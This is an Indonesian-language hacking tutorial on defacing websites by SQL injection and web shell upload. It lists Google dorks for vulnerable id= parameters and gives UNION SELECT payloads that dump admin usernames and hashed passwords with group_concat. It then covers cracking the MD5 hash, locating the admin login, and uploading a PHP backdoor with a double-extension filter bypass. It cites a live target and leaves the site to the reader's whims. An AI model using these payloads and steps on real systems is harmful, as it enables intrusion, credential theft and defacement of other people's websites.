Assalamualaikum hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial deface poc sql injection upload shell
Untuk bahan bahan nya
-Hp/Pc
-Dork
-Sc Deface/Shell
-Kesabaran
Dork:
inurl:/com-product.php?id=
inurl:/in-product.php?catid=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
KEMBANGIN LAGI!!
Oke step by step
Karna gw udh ada live target jadi ga usah ngedork lagi
Live Target Klik Disini
Seperti biasa kita kasih tanda ' jika error maka web itu vuln sql
Langsung aja kita kasih order+by+1--+- naikin terus angka nya sampe error kalo udh lanjut ke union select
Karna error di 5 kita union sampe 4
Contoh:
union+select+1,2,3,4--+-
Nah angka togel/ajaib nya adalah 3 langsung aja kasih dios di angka 3 ga punya dios nya? Silahkan ambil di sini
Kemudian cari tabel admin nya (superadmin) username nya dan password nya (hpassword)
Selanjutnya kita akan membuka username dan password dari tabel admin nya tadi dengan dios group_concat(nama username yang tadi,0x3a,nama password yg tadi) dan di akhir angka kolom nya kita tambah kan +from+nama tabel adminnya tadi
contoh:
http://web.com/detail.php?id=-1+union+select+1,2,group_concat(uname,0x3a,hpassword),4+from+superadmin--+- nanti kita akan menemukan username dan password nya seperti di gambar
Nah di gambar kan usernya ramanuser dan password nya di encrypt , jadi kota harus mencari terlebih dahulu jenis encrypt nya dengan tools untuk tools nya kalian bisa klik disini
Jika sudah ketemu lalu kita decrypt password nya, kebetulan password nya ini dengan type encrypt md5, kalian bisa mendecrypt nya dengan tools online md5 decrypt
Setelah sudah ketemu password nya lalu kita cari admin login nya bisa dengan
Site.com/admin
Site.com/admin/
Site.com/login.php
Site.com/login.php/
Site.com/robots.txt
Tapi di target ini saya tidak menemukan jadi saya view-source index nya lalu menemukan direktori admin nya
Lalu kita tinggal login dengan username dan passowrd yang telah di dapatkan
Dan kemudian cari tempat upload di sini gua upload di galery nya atau ya kalian tinggal upload shell backdoor atau sc deface kalian oh iya ga semua tempat upload bisa masukan file.php tapi target kali ini bisa jika tidak bisa dimasukan file.php kalian bisa melakukan tamper data menggunakan shell.php.jpg dan menggunakan lighting browser dan juga sandro.proxy
Kalo udah langsung aja kalian klik add
Cara akses/manggil nya?
Tinggal cari nama file yg di upload lalu buka di tab baru
Nah seperti itu contoh nya tinggal cari nama file yg di upload lalu buka di tab baru
Dan selesai kita berhasil manggil shell nya nah kalo udh gitu serah dah tuh web mau kalian apain
Oke segitu aja tutor dari gua semoga bermanfaat sekian dan terimakasih